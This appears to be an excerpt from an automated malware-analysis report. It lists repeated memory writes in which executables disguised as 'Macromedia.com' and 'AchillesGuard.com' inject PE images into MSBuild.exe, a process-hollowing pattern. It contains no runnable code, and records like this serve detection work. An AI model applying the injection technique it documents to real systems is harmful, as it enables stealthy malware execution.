Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exe | Memory written: unknown base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe | Memory written: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe | Memory written: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0000
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0064
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B00C8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B012C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0190
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B01F4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0258
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B02BC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0320
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0384
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B03E8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B044C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B04B0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0514
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0578
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B05DC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0640
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B06A4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0708
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B076C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B07D0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0834
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0898
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B08FC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0960
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B09C4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0A28
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0A8C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0AF0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0B54
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0BB8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0C1C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0C80
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0CE4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0D48
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0DAC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0E10
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0E74
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0ED8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0F3C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0FA0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1004
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1068
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B10CC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1130
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1194
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B11F8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B125C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B12C0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1324
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1388
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B13EC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1450
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B14B4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1518
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B157C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B15E0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1644
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B16A8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B170C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1770
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B17D4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1838
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B189C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1900
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1964
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B19C8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1A2C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1A90
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1AF4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1B58
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1BBC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1C20
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1C84
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1CE8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1D4C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1DB0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1E14
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1E78
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1EDC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1F40
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1FA4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2008
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B206C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B20D0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2134
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2198
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B21FC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2260
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B22C4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2328
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B238C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B23F0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2454
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B24B8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B251C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2580
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B25E4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2648
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B26AC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2710
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2774
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B27D8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B283C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B28A0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2904
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2968
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B29CC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2A30
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2A94
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2AF8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2B5C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2BC0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2C24
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2C88
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2CEC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2D50
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2DB4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2E18
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2E7C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2EE0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2F44
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2FA8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B300C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3070
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B30D4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3138
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B319C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3200
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3264
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B32C8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B332C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3390
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B33F4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3458
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B34BC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3520
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3584
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B35E8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B364C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B36B0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3714
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3778
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B37DC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3840
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B38A4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3908
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B396C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B39D0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3A34
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3A98
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3AFC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3B60
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3BC4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3C28
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3C8C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3CF0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3D54
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3DB8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3E1C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3E80
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3EE4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3F48
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3FAC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B4010
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B4074
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B40D8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B413C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B41A0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B4204
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B4268
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B42CC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B4330
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B4394
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B43F8
